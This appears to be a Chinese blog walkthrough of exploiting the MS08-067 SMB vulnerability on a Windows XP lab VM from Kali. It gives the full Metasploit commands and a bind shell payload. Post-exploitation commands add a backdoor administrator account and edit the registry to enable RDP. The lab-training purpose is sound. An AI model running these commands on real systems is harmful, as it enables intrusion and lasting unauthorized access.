MS08-067漏洞渗透测试

提示:靶机       windows XP   IP:172.16.5.27

          攻击机        kali             IP:172.16.5.28

文章目录

  • 前言
  • 漏洞介绍
  • nmap扫描
  • MS08-067利用
  • 总结

前言

利用msfconsole控制台的exploit/windows/smb/ms08_067_netapi攻击模块对靶机445端口的攻击过程,成功进入后渗透,开启靶机的3389远程登录


漏洞介绍:

ms08_067漏洞是的著名远程溢出漏洞,它的影响范围非常大,甚至一些vista的系统都会有这个远程溢出的漏洞,主要针对的是windows server 2003、windows xp

一、nmap扫描

nmap -sV 172.16.5.27 -p-   //全端口版本扫描

 靶机已开启445端口,接下来我们就可以开始渗透了

二、MS08-067利用

msfconsole     //启动msfconsole控制台
use exploit/windows/smb/ms08_067_netapi     //使用模块
set rhosts 172.16.5.27      //设置靶机ip
set lhost 172.16.5.28      //设置本地ip
set payload generic/shell_bind_tcp     //设置payload
exploit     //运行模块

 然后我们创建一个admin用户密码为123456,并给他管理员权限

net user admin 123456 /add && net localgroup administrators admin /add

靶机没有开启3389端口使用需要我们来开启

echo reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f > C:\WINDOWS\system32\3389.bat && call 3389.bat

最后再次nmap扫描发现靶机成功开启了3389端口,我们就可以远程连接了

rdesktop 172.16.5.27   //远程连接

 

总结

提示:这里对文章进行总结:
例如:MS08-067漏洞利用重点在于模块设置、创建用户和开启3389远程连接,如果需要操作环境的可以联系博主,免费提供最新版kali和含有MS08-067漏洞的靶机(windowsXP)

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值